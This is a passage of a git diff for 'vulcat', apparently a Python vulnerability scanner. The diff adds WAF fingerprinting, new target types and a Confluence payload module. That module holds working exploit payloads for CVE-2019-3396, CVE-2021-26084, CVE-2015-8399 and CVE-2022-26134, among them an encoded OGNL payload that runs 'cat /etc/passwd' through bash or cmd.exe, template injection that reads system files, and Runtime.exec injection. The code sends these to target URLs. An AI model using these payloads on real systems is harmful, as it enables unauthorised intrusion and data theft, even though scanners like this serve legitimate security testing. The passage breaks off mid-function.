self.lang['core']['stop']['next']) # ? 日志, 扫描下一个目标 + + return False def end(self): ''' 结束扫描, 等待所有线程运行完毕, 生成漏洞结果并输出/保存''' diff --git a/lib/initial/config.py b/lib/initial/config.py index 1780e68..26548e4 100644 --- a/lib/initial/config.py +++ b/lib/initial/config.py @@ -77,7 +77,7 @@ def __init__(self, args): 'https': args.http_proxy } - app_list = ['alidruid', 'airflow', 'apisix', 'appweb', 'cisco', 'django', 'f5bigip', 'fastjson', 'flink', 'keycloak', 'nacos', 'solr', 'struts2', 'spring', 'thinkphp', 'tomcat', 'ueditor', 'weblogic', 'yonyou'] + app_list = ['alidruid', 'airflow', 'apisix', 'appweb', 'cisco', 'confluence', 'django', 'elasticsearch', 'f5bigip', 'fastjson', 'flink', 'keycloak', 'nacos', 'solr', 'struts2', 'spring', 'thinkphp', 'tomcat', 'ueditor', 'weblogic', 'yonyou'] if args.application == 'all': # * -a参数 args.app_list = app_list else: diff --git a/lib/initial/language.py b/lib/initial/language.py index 242cc0e..68e3947 100644 --- a/lib/initial/language.py +++ b/lib/initial/language.py @@ -47,6 +47,12 @@ def language(): 'output_text': 'Save the scan results in TXT format, no vulnerability will not generate files(e.g. --output-text result.txt)', 'output_json': 'Save the scan results in JSON format, no vulnerability will not generate files(e.g. --output-text result.json)' }, + 'general_help': { + 'title': 'General', + 'name': 'General operating parameter', + 'no_waf': 'Disable WAF detection', + 'batch': 'The yes/no option does not require user input. The default option is used' + }, 'lists_help': { 'title': 'Lists', 'name': 'Vulnerability list', @@ -54,19 +60,26 @@ def language(): }, 'app_list_help': { 'title': 'Supported target types(Case insensitive)', - 'name': 'AliDruid,airflow,apisix,appweb,cisco,django,f5bigip,fastjson,flink,keycloak,nacos,thinkphp,tomcat,spring,solr,struts2,ueditor,weblogic,yonyou' + 'name': 'AliDruid,airflow,apisix,appweb,cisco,confluence,django,elasticsearch,f5bigip,fastjson,flink,keycloak,nacos,thinkphp,tomcat,spring,solr,struts2,ueditor,weblogic,yonyou' }, 'core': { 'start': { 'start': '[INFO] Start scanning target ', - 'unable': '[WARN] Unable to connect to ' + 'unable': '[WARN] Unable to connect to ', + 'waf': '[WAF] The WAF detection for the current URL starts', + 'waf_find': '[WAF] {} is detected, Whether to continue scanning the current URL? - y(es)/N(o): ', + 'waf_not_find': 'Not found the WAF', + 'waf_timeout': 'WAF recognizes timeout and the target is not responding', + 'waf_conn_error': 'WAF recognition error, unable to connect to destination URL', + 'waf_error': 'WAF identification error, unknown error' }, 'addpoc': { 'notfound': '[ERROR] The application not found: ', 'error': '[ERROR] The addPOC is error' }, 'stop': { - 'continue': '[INFO] Continue to scan' + 'continue': '[INFO] Continue to scan', + 'next': '[INFO] Skip current URL' }, 'end': { 'wait': '[INFO] Wait for all threads to finish. Please wait...', @@ -126,6 +139,12 @@ def language(): 'output_text': '以txt格式保存扫描结果, 无漏洞时不会生成文件(如: --output-text result.txt)', 'output_json': '以json格式保存扫描结果, 无漏洞时不会生成文件(如: --output-text result.json)' }, + 'general_help': { + 'title': 'General', + 'name': '通用工作参数', + 'no_waf': '禁用waf检测', + 'batch': 'yes/no的选项不需要用户输入, 使用默认选项' + }, 'lists_help': { 'title': 'Lists', 'name': '漏洞列表', @@ -133,19 +152,26 @@ def language(): }, 'app_list_help': { 'title': '支持的目标类型(-a参数, 不区分大小写)', - 'name': 'AliDruid,airflow,apisix,appweb,cisco,django,f5bigip,fastjson,flink,keycloak,nacos,thinkphp,tomcat,spring,solr,struts2,ueditor,weblogic,yonyou' + 'name': 'AliDruid,airflow,apisix,appweb,cisco,confluence,django,elasticsearch,f5bigip,fastjson,flink,keycloak,nacos,thinkphp,tomcat,spring,solr,struts2,ueditor,weblogic,yonyou' }, 'core': { 'start': { 'start': '[INFO] 开始扫描目标 ', - 'unable': '[WARN] 无法连接到 ' + 'unable': '[WARN] 无法连接到 ', + 'waf': '[WAF] 开始对当前url进行WAF检测', + 'waf_find': '[WAF] 目标疑似存在{} 是否继续扫描当前url? - y(es)/N(o): ', + 'waf_not_find': '[WAF] 未发现WAF', + 'waf_timeout': 'WAF识别超时, 目标没有响应', + 'waf_conn_error': 'WAF识别出错, 无法连接至目标url', + 'waf_error': 'WAF识别出错, 未知错误' }, 'addpoc': { 'notfound': '[ERROR] 未找到应用程序: ', 'error': '[ERROR] 添加POC时出现错误' }, 'stop': { - 'continue': '[INFO] 继续扫描' + 'continue': '[INFO] 继续扫描', + 'next': '[INFO] 跳过当前url' }, 'end': { 'wait': '[INFO] 等待所有线程结束, 请稍等...', diff --git a/lib/initial/list.py b/lib/initial/list.py index 126b3cb..c75703c 100644 --- a/lib/initial/list.py +++ b/lib/initial/list.py @@ -6,20 +6,23 @@ def list(): ''' 显示漏洞列表 ''' + vul_num = 0 vul_list = '' - vul_list += '+' + ('-'*15) + '+' + ('-'*18) + '+' + ('-'*12) + '+' + ('-'*10) + '+' + ('-'*60) + '+\n' + vul_list += '+' + ('-'*22) + '+' + ('-'*18) + '+' + ('-'*14) + '+' + ('-'*10) + '+' + ('-'*67) + '+\n' for vul in vul_info: for info in vul_info[vul]: - vul_list += '| {}|'.format(vul.ljust(14)) + vul_num += 1 + vul_list += '| {}|'.format(vul.ljust(21)) vul_list += ' {}|'.format(info['vul_id'].ljust(17)) - vul_list += ' {}|'.format(info['type'].ljust(11)) + vul_list += ' {}|'.format(info['type'].ljust(13)) vul_list += ' {}|'.format(info['method'].ljust(9)) - vul_list += ' {}\t|'.format(info['description'].ljust(49)) + vul_list += ' {}\t|'.format(info['description'].ljust(56)) vul_list += '\n' - vul_list += '+' + ('-'*15) + '+' + ('-'*18) + '+' + ('-'*12) + '+' + ('-'*10) + '+' + ('-'*60) + '+\n' + vul_list += '+' + ('-'*22) + '+' + ('-'*18) + '+' + ('-'*14) + '+' + ('-'*10) + '+' + ('-'*67) + '+\n' - print(color.cyan(vul_list)) + print(color.cyan(vul_list + str(vul_num - 1))) + # print(vul_num) sys.exit(0) vul_info = { @@ -31,7 +34,7 @@ def list(): 'description': 'Description\t' } ], - 'AlibabaDruid': [ + 'Alibaba Druid': [ { 'vul_id': 'None', 'type': 'unAuth', @@ -39,7 +42,7 @@ def list(): 'description': '阿里巴巴Druid未授权访问' } ], - 'AlibabaNacos': [ + 'Alibaba Nacos': [ { 'vul_id': 'CVE-2021-29441', 'type': 'unAuth', @@ -47,7 +50,7 @@ def list(): 'description': '阿里巴巴Nacos未授权访问' } ], - 'ApacheAirflow': [ + 'Apache Airflow': [ { 'vul_id': 'CVE-2020-17526', 'type': 'unAuth', @@ -55,7 +58,7 @@ def list(): 'description': 'Airflow身份验证绕过' } ], - 'ApacheAPISIX': [ + 'Apache APISIX': [ { 'vul_id': 'CVE-2020-13945', 'type': 'unAuth', @@ -63,7 +66,7 @@ def list(): 'description': 'Apache APISIX默认密钥' } ], - 'ApacheFlink': [ + 'Apache Flink': [ { 'vul_id': 'CVE-2020-17519', 'type': 'FileRead', @@ -71,7 +74,7 @@ def list(): 'description': 'Flink目录遍历' } ], - 'ApacheSolr': [ + 'Apache Solr': [ { 'vul_id': 'CVE-2021-27905', 'type': 'SSRF', @@ -79,7 +82,7 @@ def list(): 'description': 'Solr SSRF/任意文件读取' } ], - 'ApacheStruts2': [ + 'Apache Struts2': [ { 'vul_id': 'S2-001', 'type': 'RCE', @@ -117,7 +120,7 @@ def list(): 'description': 'Struts2远程代码执行' } ], - 'ApacheTomcat': [ + 'Apache Tomcat': [ { 'vul_id': 'CVE-2017-12615', 'type': 'FileUpload', @@ -133,6 +136,32 @@ def list(): 'description': 'AppWeb身份认证绕过' } ], + 'Atlassian Confluence': [ + { + 'vul_id': 'CVE-2015-8399', + 'type': 'FileRead', + 'method': 'GET', + 'description': 'Confluence任意文件包含' + }, + { + 'vul_id': 'CVE-2019-3396', + 'type': 'RCE/FileRead', + 'method': 'POST', + 'description': 'Confluence路径遍历和命令执行' + }, + { + 'vul_id': 'CVE-2021-26084', + 'type': 'RCE', + 'method': 'POST', + 'description': 'Confluence Webwork Pre-Auth OGNL表达式命令注入' + }, + { + 'vul_id': 'CVE-2022-26134', + 'type': 'RCE', + 'method': 'GET', + 'description': 'Confluence远程代码执行' + } + ], 'Cisco': [ { 'vul_id': 'CVE-2020-3580', @@ -148,18 +177,18 @@ def list(): 'method': 'GET', 'description': 'debug page XSS跨站脚本攻击' }, - { - 'vul_id': 'CVE-2019-14234', - 'type': 'SQLinject', - 'method': 'GET', - 'description': 'JSONfield SQL注入' - }, { 'vul_id': 'CVE-2018-14574', 'type': 'Redirect', 'method': 'GET', 'description': 'CommonMiddleware url重定向' }, + { + 'vul_id': 'CVE-2019-14234', + 'type': 'SQLinject', + 'method': 'GET', + 'description': 'JSONfield SQL注入' + }, { 'vul_id': 'CVE-2020-9402', 'type': 'SQLinject', @@ -173,7 +202,33 @@ def list(): 'description': 'QuerySet.order_by SQL注入' } ], - 'F5-BIG-IP': [ + 'ElasticSearch': [ + { + 'vul_id': 'CVE-2014-3120', + 'type': 'RCE', + 'method': 'POST', + 'description': 'ElasticSearch命令执行' + }, + { + 'vul_id': 'CVE-2015-1427', + 'type': 'RCE', + 'method': 'POST', + 'description': 'ElasticSearch Groovy 沙盒绕过&&代码执行' + }, + { + 'vul_id': 'CVE-2015-3337', + 'type': 'FileRead', + 'method': 'GET', + 'description': 'ElasticSearch 目录穿越' + }, + { + 'vul_id': 'CVE-2015-5531', + 'type': 'FileRead', + 'method': 'PUT/GET', + 'description': 'ElasticSearch 目录穿越' + }, + ], + 'F5 BIG-IP': [ { 'vul_id': 'CVE-2020-5902', 'type': 'RCE', @@ -189,16 +244,16 @@ def list(): ], 'Fastjson': [ { - 'vul_id': 'CNVD-2019-22238', + 'vul_id': 'CNVD-2017-02833', 'type': 'unSerialize', 'method': 'POST', - 'description': 'Fastjson <= 1.2.47 反序列化' + 'description': 'Fastjson <= 1.2.24 反序列化' }, { - 'vul_id': 'CVE-2017-18349', + 'vul_id': 'CNVD-2019-22238', 'type': 'unSerialize', 'method': 'POST', - 'description': 'Fastjson <= 1.2.24 反序列化' + 'description': 'Fastjson <= 1.2.47 反序列化' } ], 'Keycloak': [ @@ -211,10 +266,10 @@ def list(): ], 'Spring': [ { - 'vul_id': 'CVE-2022-22965', - 'type': 'RCE', - 'method': 'GET/POST', - 'description': 'Spring Framework远程代码执行' + 'vul_id': 'CVE-2020-5410', + 'type': 'FileRead', + 'method': 'GET', + 'description': 'Spring Cloud目录遍历' }, { 'vul_id': 'CVE-2021-21234', @@ -223,10 +278,10 @@ def list(): 'description': 'Spring Boot目录遍历' }, { - 'vul_id': 'CVE-2020-5410', - 'type': 'FileRead', - 'method': 'GET', - 'description': 'Spring Cloud目录遍历' + 'vul_id': 'CVE-2022-22947', + 'type': 'RCE', + 'method': 'POST', + 'description': 'Spring Cloud Gateway SpEl远程代码执行' }, { 'vul_id': 'CVE-2022-22963', @@ -235,13 +290,19 @@ def list(): 'description': 'Spring Cloud Function SpEL远程代码执行' }, { - 'vul_id': 'CVE-2022-22947', + 'vul_id': 'CVE-2022-22965', 'type': 'RCE', - 'method': 'POST', - 'description': 'Spring Cloud Gateway SpEl远程代码执行' + 'method': 'GET/POST', + 'description': 'Spring Framework远程代码执行' } ], 'ThinkPHP': [ + { + 'vul_id': 'CVE-2018-1002015', + 'type': 'RCE', + 'method': 'GET', + 'description': 'ThinkPHP5.x 远程代码执行' + }, { 'vul_id': 'CNVD-2018-24942', 'type': 'RCE', @@ -275,18 +336,18 @@ def list(): 'description': 'Ueditor编辑器SSRF' } ], - 'Weblogic': [ + 'Oracle Weblogic': [ { - 'vul_id': 'CVE-2020-14882', - 'type': 'RCE', + 'vul_id': 'CVE-2014-4210', + 'type': 'SSRF', 'method': 'GET', - 'description': 'Weblogic 未授权命令执行' + 'description': 'Weblogic 服务端请求伪造' }, { - 'vul_id': 'CVE-2020-14750', - 'type': 'unAuth', - 'method': 'GET', - 'description': 'Weblogic 权限验证绕过' + 'vul_id': 'CVE-2017-10271', + 'type': 'unSerialize', + 'method': 'POST', + 'description': 'Weblogic XMLDecoder反序列化' }, { 'vul_id': 'CVE-2019-2725', @@ -295,16 +356,16 @@ def list(): 'description': 'Weblogic wls9_async反序列化' }, { - 'vul_id': 'CVE-2017-10271', - 'type': 'unSerialize', - 'method': 'POST', - 'description': 'Weblogic XMLDecoder反序列化' + 'vul_id': 'CVE-2020-14750', + 'type': 'unAuth', + 'method': 'GET', + 'description': 'Weblogic 权限验证绕过' }, { - 'vul_id': 'CVE-2014-4210', - 'type': 'SSRF', + 'vul_id': 'CVE-2020-14882', + 'type': 'RCE', 'method': 'GET', - 'description': 'Weblogic 服务端请求伪造' + 'description': 'Weblogic 未授权命令执行' } ], 'Yonyou': [ diff --git a/lib/initial/parse.py b/lib/initial/parse.py index 521ba05..362261c 100644 --- a/lib/initial/parse.py +++ b/lib/initial/parse.py @@ -18,7 +18,7 @@ def parse(): python3 vulcat.py -u https://www.example.com/ -a thinkphp --log 3 python3 vulcat.py -f url.txt -t 10 python3 vulcat.py --list -''', version='vulcat.py-1.0.7\n') +''', version='vulcat.py-1.0.9\n') # * 指定目标 target = parser.add_option_group(lang['target_help']['title'], lang['target_help']['name']) target.add_option('-u', '--url', type='string', dest='url', default=None, help=lang['target_help']['url']) @@ -48,6 +48,12 @@ def parse(): save.add_option('--output-text', type='string', dest='txt_filename',default=None, help=lang['save_help']['output_text']) save.add_option('--output-json', type='string', dest='json_filename',default=None, help=lang['save_help']['output_json']) + # * 通用参数 + general = parser.add_option_group(lang['general_help']['title'], lang['general_help']['name']) + general.add_option('--no-waf', dest='no_waf', action='store_true', help=lang['general_help']['no_waf']) + # general.add_option('--no-webapp', dest='no_webapp', action='store_true', help='') + general.add_option('--batch', dest='batch', action='store_true', help=lang['general_help']['batch']) + # * 查看漏洞列表 lists = parser.add_option_group(lang['lists_help']['title'], lang['lists_help']['name']) lists.add_option('--list', dest='list', help=lang['lists_help']['list'], action='store_true') diff --git a/lib/tool/check.py b/lib/tool/check.py index 0e4724a..ea658d2 100644 --- a/lib/tool/check.py +++ b/lib/tool/check.py @@ -41,7 +41,7 @@ def check_res(res, md): ''' 检查poc误报 来自: https://github.com/zhzyker/vulmap/blob/main/core/verify.py ''' - res_info = "echo.{0,10}" + md + res_info = "echo.{0,20}" + md if(re.search(res_info, res) != None): return "not_vul" else: diff --git a/lib/tool/fingerprint.py b/lib/tool/fingerprint.py index 56b2f5b..81e9278 100644 --- a/lib/tool/fingerprint.py +++ b/lib/tool/fingerprint.py @@ -1,15 +1,183 @@ #!/usr/bin/env python3 # -*- coding:utf-8 -*- -''' 还没写好, 敬请期待 +''' + web应用程序防火墙 指纹识别 + 参考-1: https://mp.weixin.qq.com/s/8F060FU9g_78z57UKS-JsQ - 用于web指纹识别 - Used for Web fingerprint identification + web应用程序/框架 指纹识别 + 敬请期待 ''' -def fingerprint(): - pass +from lib.initial.config import config +from lib.tool.logger import logger +from lib.tool import check +from thirdparty import requests +from time import sleep + +class Identify(): + def webapp_identify(self): + ''' + web应用程序/框架识别 + ''' + + + def waf_identify(self, url): + ''' + waf识别 + ''' + try: + vul_info = { + 'app_name': 'WAF', + 'vul_id': 'identify' + } + path_1 = '?id=1 and 1=1 -- qwe' + path_2 = '?id=1\'">//' + + url_1 = url + path_1 + url_2 = url + path_2 + + logger.info('yellow_ex', self.lang['core']['start']['waf']) + + res = requests.get( + url_2, + timeout=self.timeout, + headers=self.headers, + proxies=self.proxies, + verify=False, + allow_redirects=False + ) + logger.logging(vul_info, res.status_code, res) # * LOG + + res.encoding = 'utf-8' + for waf_fp in self.waf_fingerprint: + for finger in waf_fp['fingerprint']: + # if ((res.status_code == waf_fp['status_code']) and (finger in res.text)): + if (finger in res.text): + return waf_fp['name'] + + return None + except requests.ConnectTimeout: + logger.info('red_ex', self.lang['core']['start']['waf_timeout']) + return None + except requests.ConnectionError: + logger.logging('red_ex', self.lang['core']['start']['waf_conn_error']) + return None + except: + logger.logging('red_ex', self.lang['core']['start']['waf_error']) + return None + + + def __init__(self): + self.timeout = config.get('timeout') + self.headers = config.get('headers') + self.proxies = config.get('proxies') + self.lang = config.get('lang') + + # * webapp指纹库 + self.webapp_fingerprint = [ + '敬请期待' + ] + # * waf指纹库 + self.waf_fingerprint = [ + { + 'name': '阿里云盾(Aliyun Waf)', + 'status_code': 405, + 'fingerprint': [ + '很抱歉,由于您访问的URL有可能对网站造成安全威胁,您的访问被阻断', + 'your request has been blocked as it may cause potential threats to the server' + ] + }, + { + 'name': '腾讯云盾(Tencent WAF)', + 'status_code': 403, + 'fingerprint': [ + '腾讯T-Sec Web应用防火墙(WAF)', + # '很抱歉,您提交的请求可能对网站造成威胁,请求已被管理员设置的策略阻断' + ] + }, + { + 'name': '安全狗(SafeDog)', + 'status_code': None, + 'fingerprint': [ + '如果您是网站管理员,请登录安全狗', + '您的请求带有不合法参数,已被网站管理员设置拦截' + ] + }, + { + 'name': '华为云盾(HuaWei WAF)', + 'status_code': 418, + 'fingerprint': [ + '您的请求疑似攻击行为' + ] + }, + { + 'name': '网宿云盾', + 'status_code': None, + 'fingerprint': [ + '您当前的访问行为存在异常,请稍后重试' + ] + }, + { + 'name': '创宇盾', + 'status_code': None, + 'fingerprint': [ + '当前访问疑似黑客攻击,已被创宇盾拦截', + '最近有可疑的攻击行为,请稍后重试' + ] + }, + { + 'name': '玄武盾', + 'status_code': None, + 'fingerprint': [ + '您的访问可能对网站造成危险,已被云防护安全拦截' + ] + }, + # { + # 'name': '360网站卫士', + # 'status_code': None, + # 'fingerprint': [ + # '当前访问可能对网站安全造成威胁,已被网站卫士拦截' + # ] + # }, + # { + # 'name': '奇安信网站卫士 ', + # 'status_code': 493, + # 'fingerprint': [ + # '抱歉!您的访问可能对网站造成威胁,已被云防护拦截' + # ] + # }, + { + 'name': '长亭SafeLine', + 'status_code': 403, + 'fingerprint': [ + '您的访问请求可能对网站造成安全威胁,请求已被 长亭 SafeLine 阻断' + ] + }, + { + 'name': 'OpenRASP', + 'status_code': 400, + 'fingerprint': [ + 'Request blocked by OpenRASP', + '您的请求包含恶意行为,已被服务器拒绝' + ] + }, + { + 'name': '西部数码云网盾', + 'status_code': None, + 'fingerprint': [ + '检测到疑似攻击行为,访问已被云网盾拦截', + '系统检查到您的访问存在疑似攻击的行为,已经自动列入禁止名单' + ] + }, + # { + # 'name': '', + # 'status_code': 403, + # 'fingerprint': [ + # '' + # ] + # } + ] -def identify(): - pass \ No newline at end of file +identify = Identify() \ No newline at end of file diff --git a/lib/tool/head.py b/lib/tool/head.py new file mode 100644 index 0000000..44693ef --- /dev/null +++ b/lib/tool/head.py @@ -0,0 +1,16 @@ +#!/usr/bin/env /python3 +# -*- coding:utf-8 -*- + +''' + Headers请求头处理 + 合并2个headers +''' + +def merge(old_headers, new_headers): + ''' + 用于合并2个headers, 并返回合并后的headers, 新headers将会覆盖旧headers中的同名内容. + ''' + + merge_headers = old_headers.copy() + merge_headers.update(new_headers) + return merge_headers \ No newline at end of file diff --git a/lib/tool/logger.py b/lib/tool/logger.py index 34aabd5..254f1e0 100644 --- a/lib/tool/logger.py +++ b/lib/tool/logger.py @@ -91,6 +91,7 @@ def logging_5(self, vul_info, status_code, res): def logging_6(self, vul_info, status_code, res): ''' 日志6级, (框架名称+状态码+漏洞编号)+请求包+响应头+响应内容 ''' + res.encoding = 'utf-8' info_6 = self.logging_5(vul_info, status_code, res) try: info_6 = info_6[:-1] diff --git a/payloads/AtlassianConfluence.py b/payloads/AtlassianConfluence.py new file mode 100644 index 0000000..1d4d67a --- /dev/null +++ b/payloads/AtlassianConfluence.py @@ -0,0 +1,386 @@ +#!/usr/bin/env python3 +# -*- coding:utf-8 -*- + +''' + Atlassian Confluence扫描类: + 1. Confluence路径遍历和命令执行 + CVE-2019-3396 + Payload: https://vulhub.org/#/environments/confluence/CVE-2019-3396/ + + 2. Confluence Server Webwork Pre-Auth OGNL表达式命令注入 + CVE-2021-26084 + Payload: https://vulhub.org/#/environments/confluence/CVE-2021-26084/ + + 3. Confluence任意文件包含 + CVE-2015-8399 + Payload: https://blog.csdn.net/caiqiiqi/article/details/106004003 + + 4. Confluence远程代码执行 + CVE-2022-26134 + Payload: https://github.com/vulhub/vulhub/tree/master/confluence/CVE-2022-26134 + +file:///etc/passwd +file:///C:\Windows\System32\drivers\etc\hosts +file:///C:/Windows/System32/drivers/etc/hosts +''' + +from lib.api.dns import dns +from lib.initial.config import config +from lib.tool.md5 import md5, random_md5 +from lib.tool.logger import logger +from lib.tool.thread import thread +from lib.tool import check +from lib.tool import head +from thirdparty import requests +from time import sleep + +class AtlassianConfluence(): + def __init__(self): + self.timeout = config.get('timeout') + self.headers = config.get('headers').copy() + self.proxies = config.get('proxies') + + self.app_name = 'AtlassianConfluence' + self.md = md5(self.app_name) + self.cmd = 'echo ' + self.md + + self.cve_2019_3396_payloads = [ + # { # * 用于命令执行, 需要将payload保存至.vm文件中, 然后加载远程文件 + # 'path': 'rest/tinymce/1/macro/preview', + # 'data': '{"contentId": "786458", "macro":{"name": "widget", "body":"", "params":{"url": "https://www.example.com/v/123456", "width": "1000"," height": "1000","_template":"https://www.example.com/confluence.vm","command":' + self.cmd + '}}}', + # 'headers': self.headers.update({ + # 'Content-Type': 'application/json; charset=utf-8' + # }) + # }, + { + 'path': 'rest/tinymce/1/macro/preview', + 'data': '{"contentId": "786458", "macro":{"name": "widget", "body":"", "params":{"url": "https://www.viddler.com/v/23464dc6", "width": "1000"," height": "1000","_template":"file:///etc/passwd"}}}', + 'headers': head.merge(self.headers, {'Content-Type': 'application/json; charset=utf-8'}) + }, + { + 'path': 'rest/tinymce/1/macro/preview', + 'data': '{"contentId": "786458", "macro":{"name": "widget", "body":"", "params":{"url": "https://www.viddler.com/v/23464dc6", "width": "1000"," height": "1000","_template":"file:///C:\Windows\System32\drivers\etc\hosts"}}}', + 'headers': head.merge(self.headers, {'Content-Type': 'application/json; charset=utf-8'}) + }, + { + 'path': 'rest/tinymce/1/macro/preview', + 'data': '{"contentId": "786458", "macro":{"name": "widget", "body":"", "params":{"url": "https://www.viddler.com/v/23464dc6", "width": "1000"," height": "1000","_template":"file:///C:/Windows/System32/drivers/etc/hosts"}}}', + 'headers': head.merge(self.headers, {'Content-Type': 'application/json; charset=utf-8'}) + }, + { + 'path': 'rest/tinymce/1/macro/preview', + 'data': '{"contentId": "786458", "macro":{"name": "widget", "body":"", "params":{"url": "https://www.viddler.com/v/23464dc6", "width": "1000"," height": "1000","_template":"../web.xml"}}}', + 'headers': head.merge(self.headers, {'Content-Type': 'application/json; charset=utf-8'}) + } + ] + + self.cve_2021_26084_payloads = [ + { + 'path': 'pages/doenterpagevariables.action', + 'data': 'queryString=%5cu0027%2b%7bClass.forName%28%5cu0027javax.script.ScriptEngineManager%5cu0027%29.newInstance%28%29.getEngineByName%28%5cu0027JavaScript%5cu0027%29.%5cu0065val%28%5cu0027var+isWin+%3d+java.lang.System.getProperty%28%5cu0022os.name%5cu0022%29.toLowerCase%28%29.contains%28%5cu0022win%5cu0022%29%3b+var+cmd+%3d+new+java.lang.String%28%5cu0022cat%20/etc/passwd%5cu0022%29%3bvar+p+%3d+new+java.lang.ProcessBuilder%28%29%3b+if%28isWin%29%7bp.command%28%5cu0022cmd.exe%5cu0022%2c+%5cu0022%2fc%5cu0022%2c+cmd%29%3b+%7d+else%7bp.command%28%5cu0022bash%5cu0022%2c+%5cu0022-c%5cu0022%2c+cmd%29%3b+%7dp.redirectErrorStream%28true%29%3b+var+process%3d+p.start%28%29%3b+var+inputStreamReader+%3d+new+java.io.InputStreamReader%28process.getInputStream%28%29%29%3b+var+bufferedReader+%3d+new+java.io.BufferedReader%28inputStreamReader%29%3b+var+line+%3d+%5cu0022%5cu0022%3b+var+output+%3d+%5cu0022%5cu0022%3b+while%28%28line+%3d+bufferedReader.readLine%28%29%29+%21%3d+null%29%7boutput+%3d+output+%2b+line+%2b+java.lang.Character.toString%2810%29%3b+%7d%5cu0027%29%7d%2b%5cu0027', + 'headers': head.merge(self.headers, {}) + }, + { + 'path': 'pages/doenterpagevariables.action', + 'data': 'queryString=%5cu0027%2b%7b555*666%7d%2b%5cu0027', + 'headers': head.merge(self.headers, {}) + } + ] + + self.cve_2015_8399_payloads = [ + { + 'path': 'viewdefaultdecorator.action?decoratorName=file:///etc/passwd', + 'data': '', + 'headers': head.merge(self.headers, {}) + }, + { + 'path': 'viewdefaultdecorator.action?decoratorName=file:///C:\Windows\System32\drivers\etc\hosts', + 'data': '', + 'headers': head.merge(self.headers, {}) + }, + { + 'path': 'viewdefaultdecorator.action?decoratorName=file:///C:/Windows/System32/drivers/etc/hosts', + 'data': '', + 'headers': head.merge(self.headers, {}) + }, + { + 'path': 'viewdefaultdecorator.action?decoratorName=/WEB-INF/web.xml', + 'data': '', + 'headers': head.merge(self.headers, {}) + }, + # { + # 'path': 'spaces/viewdefaultdecorator.action?decoratorName=file:///etc/passwd', + # 'data': '', + # 'headers': head.merge(self.headers, {}) + # }, + # { + # 'path': 'spaces/viewdefaultdecorator.action?decoratorName=file:///C:\Windows\System32\drivers\etc\hosts', + # 'data': '', + # 'headers': head.merge(self.headers, {}) + # }, + # { + # 'path': 'spaces/viewdefaultdecorator.action?decoratorName=file:///C:/Windows/System32/drivers/etc/hosts', + # 'data': '', + # 'headers': head.merge(self.headers, {}) + # }, + # { + # 'path': 'spaces/viewdefaultdecorator.action?decoratorName=/WEB-INF/web.xml', + # 'data': '', + # 'headers': head.merge(self.headers, {}) + # } + ] + + self.cve_2022_26134_payloads = [ + { + 'path': '%24%7B%28%23a%3D%40org.apache.commons.io.IOUtils%40toString%28%40java.lang.Runtime%40getRuntime%28%29.exec%28%22echo%20{}%22%29.getInputStream%28%29%2C%22utf-8%22%29%29.%28%40com.opensymphony.webwork.ServletActionContext%40getResponse%28%29.setHeader%28%22X-Cmd-Response%22%2C%23a%29%29%7D/'.format(self.md), + 'data': '', + 'headers': head.merge(self.headers, {}) + } + ] + + def cve_2019_3396_scan(self, url): + ''' Atlassian Confluence 6.14.2 版本之前存在未经授权的目录遍历漏洞, + 攻击者可以使用 Velocity 模板注入读取任意文件或执行任意命令 + ''' + vul_info = {} + vul_info['app_name'] = self.app_name + vul_info['vul_type'] = 'RCE/FileRead' + vul_info['vul_id'] = 'CVE-2019-3396' + vul_info['vul_method'] = 'POST' + + for payload in self.cve_2019_3396_payloads: + path = payload['path'] + data = payload['data'] + headers = payload['headers'] + target = url + path + + vul_info['path'] = path + vul_info['data'] = data + vul_info['headers'] = headers + vul_info['target'] = target + + headers['Referer'] = 'http://' + logger.get_domain(url) # * Referer头, Confluence有时会有XSRF检测, 必须是目标的Host才行 + + try: + res = requests.post( + target, + timeout=self.timeout, + headers=headers, + data=data, + proxies=self.proxies, + verify=False + ) + logger.logging(vul_info, res.status_code, res) # * LOG + except requests.ConnectTimeout: + logger.logging(vul_info, 'Timeout') + return None + except requests.ConnectionError: + logger.logging(vul_info, 'Faild') + return None + except: + logger.logging(vul_info, 'Error') + return None + + if ((self.md in check.check_res(res.text, self.md)) + or (('/sbin/nologin' in res.text) or ('root:x:0:0:root' in res.text)) + or (('' in res.text) and ('Confluence' in res.text)) + or ('Microsoft Corp' in res.text) + or ('Microsoft TCP/IP for Windows' in res.text) + ): + results = { + 'Target': target, + 'Type': [vul_info['app_name'], vul_info['vul_type'], vul_info['vul_id']], + 'Method': vul_info['vul_method'], + 'Payload': { + 'Url': url, + 'Path': path, + 'Data': data, + 'Headers': headers + } + } + return results + + def cve_2021_26084_scan(self, url): + ''' Confluence存在一个OGNL注入漏洞, + 允许未经身份验证的攻击者在Confluence服务器或数据中心实例上执行任意代码 + ''' + vul_info = {} + vul_info['app_name'] = self.app_name + vul_info['vul_type'] = 'RCE' + vul_info['vul_id'] = 'CVE-2021-26084' + vul_info['vul_method'] = 'POST' + + for payload in self.cve_2021_26084_payloads: + path = payload['path'] + data = payload['data'] + headers = payload['headers'] + target = url + path + + vul_info['path'] = path + vul_info['data'] = data + vul_info['headers'] = headers + vul_info['target'] = target + + try: + res = requests.post( + target, + timeout=self.timeout, + headers=headers, + data=data, + proxies=self.proxies, + verify=False, + allow_redirects=False + ) + logger.logging(vul_info, res.status_code, res) # * LOG + except requests.ConnectTimeout: + logger.logging(vul_info, 'Timeout') + return None + except requests.ConnectionError: + logger.logging(vul_info, 'Faild') + return None + except: + logger.logging(vul_info, 'Error') + return None + + if (('369630' in res.text) + or (('/sbin/nologin' in res.text) or ('root:x:0:0:root' in res.text)) + # or ('Microsoft Corp' in res.text) + # or ('Microsoft TCP/IP for Windows' in res.text) + ): + results = { + 'Target': target, + 'Type': [vul_info['app_name'], vul_info['vul_type'], vul_info['vul_id']], + 'Method': vul_info['vul_method'], + 'Payload': { + 'Url': url, + 'Path': path, + 'Data': data, + 'Headers': headers + } + } + return results + + def cve_2015_8399_scan(self, url): + ''' tlassian Confluence 5.8.17之前版本中存在安全, + 该漏洞源于spaces/viewdefaultdecorator.action和admin/viewdefaultdecorator.action文件 + 没有充分过滤'decoratorName'参数, + 远程攻击者可利用该漏洞读取配置文件 + ''' + vul_info = {} + vul_info['app_name'] = self.app_name + vul_info['vul_type'] = 'FileRead' + vul_info['vul_id'] = 'CVE-2015-8399' + vul_info['vul_method'] = 'GET' + + for payload in self.cve_2015_8399_payloads: + path = payload['path'] + data = payload['data'] + headers = payload['headers'] + target = url + path + + vul_info['path'] = path + vul_info['data'] = data + vul_info['headers'] = headers + vul_info['target'] = target + + try: + res = requests.get( + target, + timeout=self.timeout, + headers=headers, + data=data, + proxies=self.proxies, + verify=False, + allow_redirects=False + ) 